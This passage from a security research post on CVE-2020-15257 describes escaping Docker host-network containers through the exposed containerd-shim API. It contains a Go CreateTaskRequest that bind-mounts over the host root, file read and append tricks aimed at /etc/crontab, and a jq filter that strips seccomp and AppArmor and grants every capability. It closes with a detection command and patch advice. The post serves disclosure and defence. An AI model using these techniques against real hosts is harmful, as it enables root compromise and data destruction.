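	for _, opt := range strings.Split(fields[3], ",") {
		if strings.HasPrefix(opt, "upperdir=") {
			upper := strings.TrimPrefix(opt, "upperdir=")
			return path.Join(path.Dir(upper), "merged"), true
		}
	}
	return "", false
}

func main() {
	// Shortened example line; "abc123" is a placeholder layer ID.
	line := "overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/A:/var/lib/docker/overlay2/l/B," +
		"upperdir=/var/lib/docker/overlay2/abc123/diff,workdir=/var/lib/docker/overlay2/abc123/work,xino=off 0 0"
	if dir, ok := mergedDir(line); ok {
		fmt.Println(dir)
	}
}
```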
So, what can we do with this? Well, with the containerd ID for our host network namespace container, we can re-Create() it from its existing config. In this situation, an interesting divergence between containerd 1.2.x and 1.3.x mentioned above is that we can’t pass mounts in for containerd 1.3.x via an RPC field; however, we can do so with containerd 1.2.x. When mounts are supplied via RPC fields, they are essentially passed directly to mount(2) without validation; the only limitation is that the target is always the /run/containerd/io.containerd.runtime.v1.linux/moby/<id>/rootfs directory. Additionally, these mount(2)s are performed before any others used to build the container from the container image. However, it should be noted that standard Docker containers do not actually use the rootfs directory directly and are instead based out of directories such as /var/lib/docker/overlay2/<id>/merged. Due to this, we cannot simply bind mount(1) "/" to rootfs and expect that a reduced directory image (i.e. one without /bin) would be able to access the host filesystem. However, we can perform such a mount(2) and then bind mount(2) additional directories over that. The end result is that the subsequent binds are then applied to the host / directory itself through the mount from rootfs. However, this is an extremely dangerous operation as containerd(-shim)’s final act of running runc delete will cause the entire rootfs directory to be recursively removed. As this would now point to / on the host, this would result in the deletion of the entire filesystem. But if you would not heed the author’s dire warning, the following snippets may be used to test the issue:
# mkdir -p /tmp/fakeroot/{etc,proc}
# echo "foo" > /tmp/fakeroot/etc/foo
# mkdir -p /tmp/overmount/etc
# echo "bar" > /tmp/overmount/etc/bar
_, err = c.Create(ctx, &shimapi.CreateTaskRequest{
	ID:       taskId,
	Bundle:   bundle,
	Terminal: false,
	Stdin:    "/dev/null",
	Stdout:   "/dev/null",
	Stderr:   "/dev/null",
	Rootfs: []*types.Mount{
		{
			Type:   "none",
			Source: "/tmp/fakeroot",
			Options: []string{
				"rw",
				"bind",
			},
		},
		{
			Type:   "none",
			Source: "/tmp/overmount",
			Options: []string{
				"rw",
				"bind",
			},
		},
	},
})
Going back to containerd-shim’s IO handling, we have a pretty clear arbitrary file read capability from pointing Stdin to any file we choose. We also have an arbitrary file write with containerd-shim’s file:// URI support in 1.3.x, and an arbitrary file append in both versions. Given the append-only restriction, any append modifications to our own config.json are essentially ignored. Instead, a good target in general is /etc/crontab if the host is running cron. All you have to do is point Stdout or Stderr at it and then have your malicious container output a crontab line.
Given that we can, on containerd 1.3.x, overwrite our own container’s config.json and create a new container from it, or load a custom config.json from our own container’s filesystem, what can we do to run a highly privileged container? First, we should talk about what this config.json file actually is. It’s an OCI runtime config file[13] that is technically supported by several implementations.
From a privilege escalation perspective, the relevant fields are process.capabilities.(bounding,effective,inheritable,permitted), process.(apparmorProfile,selinuxLabel), mounts, linux.namespaces, and linux.seccomp. From an operational perspective, root.path and process.(args,env) are the important ones, with root.path being the most important for us. Given that it sets the root of the container filesystem from the perspective of the host, we will need to make sure it points somewhere useful (i.e. if we plan to run something from an image). If “re-using” an existing container’s config.json, such as our own, root.path can be left untouched; but if loading one from our own container, root.path would need to be patched up to reference somewhere in our container’s filesystem. As part of my exploit that overwrites my container’s config.json file, I use jq to transform its contents (obtained via Stdin) with the following filter:
jq '. | del(.linux.seccomp)
  | del(.linux.namespaces[3])
  | (.process.apparmorProfile="unconfined")
  | (.process.capabilities.bounding=["CAP_CHOWN","CAP_DAC_OVERRIDE","CAP_DAC_READ_SEARCH",
      "CAP_FOWNER","CAP_FSETID","CAP_KILL","CAP_SETGID","CAP_SETUID","CAP_SETPCAP",
      "CAP_LINUX_IMMUTABLE","CAP_NET_BIND_SERVICE","CAP_NET_BROADCAST","CAP_NET_ADMIN",
      "CAP_NET_RAW","CAP_IPC_LOCK","CAP_IPC_OWNER","CAP_SYS_MODULE","CAP_SYS_RAWIO",
      "CAP_SYS_CHROOT","CAP_SYS_PTRACE","CAP_SYS_PACCT","CAP_SYS_ADMIN","CAP_SYS_BOOT",
      "CAP_SYS_NICE","CAP_SYS_RESOURCE","CAP_SYS_TIME","CAP_SYS_TTY_CONFIG","CAP_MKNOD",
      "CAP_LEASE","CAP_AUDIT_WRITE","CAP_AUDIT_CONTROL","CAP_SETFCAP","CAP_MAC_OVERRIDE",
      "CAP_MAC_ADMIN","CAP_SYSLOG","CAP_WAKE_ALARM","CAP_BLOCK_SUSPEND","CAP_AUDIT_READ"])
  | (.process.capabilities.effective=.process.capabilities.bounding)
  | (.process.capabilities.inheritable=.process.capabilities.bounding)
  | (.process.capabilities.permitted=.process.capabilities.bounding)'
If an attacker can successfully connect to a containerd-shim socket, they can directly compromise a host. Prior to the patch for CVE-2020-15257 (fixed in containerd 1.3.9 and 1.4.3, with backport patches provided to distros for 1.2.x), host networking on Docker and Kubernetes (when using Docker or containerd CRI) was root-equivalent.
Abstract namespace Unix domain sockets can be extremely dangerous when applied to containerized contexts (especially because containers will often share network namespaces with each other).
It is unclear how the risks of abstract namespace sockets were not taken into account by the core infrastructure responsible for running the majority of the world’s containers. It is also unclear how this behavior went unnoticed for so long. If anything, it suggests that containerd has not undergone a proper security assessment.
Writing exploits to abuse containerd-shim was pretty fun. Losing an entire test VM that wasn’t fully backed up due to containerd/runc not bothering to unmount everything before rm -rf-ing the supposed “rootfs” was not fun.
Our full technical advisory for this issue is available here.[14]
Assuming there are containers running on a host, the following command can be used to quickly determine if a vulnerable version of containerd is in use.
$ cat /proc/net/unix | grep 'containerd-shim' | grep '@'
If this prints any abstract (@-prefixed) containerd-shim sockets, a vulnerable version is in use; until it is patched, avoid using host networked containers that run as the real root user.
So as not to immediately impact users who have not yet been able to update to a patched version of containerd and restart their containers, we will wait until January 11th, 2021 to publish the full exploit code demonstrating the attacks described in this post. Users should keep in mind that the content in this post is sufficient to develop a working exploit, and are implored to apply the patches (and restart their containers) immediately if they have not done so already.
1. http://alexander.holbreich.org/docker-components-explained/
2. https://github.com/containerd/containerd/blob/v1.3.0/runtime/v1/shim/client/client.go
3. https://github.com/containerd/containerd/blob/v1.3.0/cmd/containerd-shim/main_unix.go
4. https://github.com/golang/go/blob/a38a917aee626a9b9d5ce2b93964f586bf759ea0/src/syscall/syscall_linux.go#L391
5. https://github.com/nccgroup/ebpf/blob/9f3459d52729d4cd75095558a59f8f2808036e10/unixdump/unixdump/__init__.py#L77
6. https://github.com/containerd/containerd/blob/v1.3.0/cmd/containerd-shim/shim_linux.go
7. https://github.com/containerd/ttrpc/blob/v1.0.1/unixcreds_linux.go
8. https://groups.google.com/forum/message/raw?msg=comp.lang.ada/E9bNCvDQ12k/1tezW24ZxdAJ
9. https://github.com/moby/moby/blob/master/profiles/apparmor/template.go
10. https://github.com/containerd/containerd/blob/v1.3.0/runtime/v1/shim/v1/shim.proto
11. https://github.com/containerd/containerd/blob/v1.3.0/runtime/v1/shim/service.go#L117
12. https://github.com/containerd/containerd/blob/v1.3.0/pkg/process/io.go#L79
13. https://github.com/opencontainers/runtime-spec/blob/master/config.md
14. https://research.nccgroup.com/2020/11/30/technical-advisory-containerd-containerd-shim-api-exposed-to-host-network-containers-cve-2020-15257/